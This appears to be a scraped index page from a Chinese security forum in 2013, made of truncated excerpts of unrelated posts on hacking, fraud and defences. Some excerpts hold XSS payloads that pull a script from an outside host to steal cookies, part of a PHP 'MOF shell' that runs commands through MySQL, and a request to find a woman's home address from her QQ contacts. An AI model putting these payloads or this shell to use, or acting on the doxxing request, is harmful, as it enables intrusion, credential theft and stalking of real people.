根据互联网进化论的说明，说未来，互联网使用人数越来越多，互联网越来越智能，那么，到某个时候，互联网是否会成为一个具有独立思考能力的大脑，或者

登上了一个妹纸的QQ,怎么社出她准确的家庭住址 小泽 | 2013-11-29 18:27 个人信息没泄露 号里有她闺蜜，同学，朋友，家人 有几个年级的班群 [原文地址] 相关讨论： 1#

如何让100个请求同时发生 xsser (十根阳具有长短!!) | 2013-11-29 23:35 严格意义上的同时 有什么办法么 [原文地址] 相关讨论： 1# neal | 2013-11-29 23:36 开一百台电脑 这么简单的问

31字符xss挑战 vakin | 2013-11-21 12:13 要求能或得cookie，cookie啊。 <script src=http://></script> 都去了29个了。 [原文地址] 相关讨论： 1# 木易耳朵 | 2013-11-21 12:17 <script/src=//></script> 2# Noxxx | 2013-11-21 12:23 <script src=http:t.cn/8aaaaa0>

视频: 团伙假冒军官持首长“中央密令”劫狱视频曝光 《东方时空》 20131130，后续报道，26分钟开始 “懂不懂《保密法》，赶快回避！”“首长，

安全对内外部双方来说都是个难题。从内部来看，我们需要舒适感和安全感；从外部来看，窃贼、黑客和蓄意破坏者在不断寻找突破口。大部分人都觉得自己的

Attackers have managed to steal Bitcoins worth more than $1 million (1295 BTC) from Danish payments startup Bitcoin Payment Solutions (BIPS), the firm has admitted. The apparently Russian-originated breach occurred between 15 and 17 November when BIPS was hit by DDoS attack which turned out to be a distraction designed to allow criminals to launch a separate raid on servers hosting consumer Bitcoin wallets. “BIPS has

关于手机隐私信息获取（期待行业人士破冰）-讨论贴 啦绯哥 | 2013-11-27 15:38 自从用了智能手机后，很多应用安装时会提示获取手机号码、获取联系人、读取短信记录、

警告：本文内容仅作技术讨论！严禁用于违法用途！负责后果自负！ 关于盗取支付宝讨论 whirlwind | 2013-11-26 00:17 今天地铁八点上面写的西安抓了一些盗取支付宝的人，讨论下

又见网银诈骗... rabbitsafe | 2013-11-25 23:27 今天有个QQ突然加我,看了下第一反应不是社工就是骗子,给大家看下聊天记录. 之后骗子就没回消息了 骗子并不高明,但如果

遇到一个加密方式 只有1和0 求大神告知 雅柏菲卡 (万物有灵，切忌污损。。。。。。) | 2013-11-26 01:34 00111100001000111010100101111110000000010010001100111001101001011100110010000100101000111111111010100111011101110011000010011111100011101110001110101000010010110011011100011000000001000010001000010100001111100101011000001000 以上是密码 [原文地址] 各种讨论： 1# isxenos (此处内容只有点击

我在一个月里谈崩了18个女生 三十度 | 2013-11-25 20:13 最近一个月，奉父母之命，相续和女孩子交谈过，家里觉得我年龄大了，是到该谈一个朋友的时候了，然而我非常

<?php $path="c:/windows/system32/canimei"; session_start(); if(!empty($_POST['submit'])){ setcookie("connect"); setcookie("connect[host]",$_POST['host']); setcookie("connect[user]",$_POST['user']); setcookie("connect[pass]",$_POST['pass']); setcookie("connect[dbname]",$_POST['dbname']); echo "<script>location.href='?action=connect'</script>"; } if(empty($_GET["action"])){ ?> <html> <head><title>Win MOF Shell</title></head> <body> <form action="?action=connect" method="post"> Host: <input type="text" name="host" value="192.168.200.144:3306"><br/> User: <input type="text" name="user" value="root"><br/> Pass: <input type="password" name="pass" value="toor"><br/> DB: <input type="text" name="dbname" value="mysql"><br/> <input type="submit" name="submit" value="Submit"><br/> </form> </body> </html> <?php exit; } if ($_GET[action]=='connect') { $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>'); echo "<form action='' method='post'>"; echo "Cmd:"; echo "<input type='text' name='cmd' value='$strCmd'?>"; echo

0x00 背景 电商网站由于是直接涉及到金钱的交易，对其本身的安全性要求很高。 这样才能保证普通网民在其网站做金钱交易的时候，不会发生安全问题。 双11刚

大家好，我是OpenCDN团队的Twwy(@囧思八千)。 我只是从技术角度，阐述一下个人观点，如果有什么金融的原理上的错误，还望大牛指出。 首先

0x00 闲扯 好吧继上一篇文章之后，就没发文章了！(其实是一直在写但是写的很少还凑不起一篇文章而已) 但是这几天对插件进行了一定的改良了 因为在自己在实

Tomcat在安装的时候会有下面的界面，我们通常部署war，用的最多的是默认的8080端口。 可是当8080端口被防火墙封闭的时候，是否还有办

严重警告： 本文内容纯属业余恶搞娱乐，不牵扯任何敏感话题，文章内容真实性无从考证！本站并不赞同文中任何观点；如果读者私自非法传播、转载或进行任

社工某黑阔大牛的域名 浅蓝 (Qq:996220065) | 2013-11-23 12:09 作者:浅蓝 目标:www.52zey.com 在某个黑阔群看见个大牛：大量出售肉鸡服务器(2649331420)

0x00 前言 大家好，我们是OpenCDN团队的Twwy。这次我们来讲讲如何通过简单的配置文件来实现nginx防御攻击的效果。 其实很多时候，各种防攻

0x00 背景 目前安全测试的软件越来越多，也越来越强大，越来越多的人成为[黑客]，今天在网上看到一个文章说拦截wvs的扫描，勾起了我写这篇文章的欲望

0x00 越权漏洞 越权漏洞是Web应用程序中一种常见的安全漏洞。它的威胁在于一个账户即可控制全站用户数据。当然这些数据仅限于存在漏洞功能对应的数据。

0x00 前言 最近看到微博以及一些论坛谈论关于GSM Hacking的比较多，使用的是开源的程序 osmocombb 和摩托罗拉的手机 c118。我也凑凑热闹，找来相关资料

Introduction Analysis of the exploit Analysis of the CSRF payload Consequences of a malicious DNS server Prevalence of the exploit Recommendations to mitigate the problem Affected Devices References Introduction Today the majority of wired Internet connections is used with an embedded NAT router, which allows using the same Internet connection with several devices in parallel and also provides some protection against incoming attacks from the Internet. Most of these routers

0x00 背景 路由被CSRF攻击，修改DNS的话题最近一直比较活跃，但是国内貌似没有一个技术文章详细的分析此漏洞，漏洞成因比较简单，本篇来科普一下。

0x00 环境分析 近期爆出的D-link的后门让大家人心惶惶。。还好我不用D-link，这样就完事了？用户有能力补上漏洞吗，厂商能及时通知用户防止中

目录 0x00 Flash CSRF名词解释 0x01 Flash CSRF形成的原因 0x02 Flash CSRF可以干些什么 0x03 Flash CSRF如何利用 0x04 Flash CSRF怎么防御 0x00 Flash CSRF名词解释 CSRF（

接到“京东”的客服电话之后遭遇团伙诈骗 笔墨 (来人呐笔墨伺候！) | 2013-11-21 20:13 今晚跟同事正欢快的吃着火锅，突然电话响了起来，一看来电提示，京东客服。 接

Hello! Ivan Fratric из Google Security Team обнаружил ошибку в nginx, которая позволяет в некоторых случаях обходить огра

如何从无线路由器到个人PC机？ 撸王之王撸断肠 (><script>alert(document.c) | 2013-11-20 08:59 如题！ 已知目标无线网络密码，如何进一步获取PC权限？ [原文地址] 相关讨论： 1# Nu11 | 2013-11-20 09:22 0x1 嗅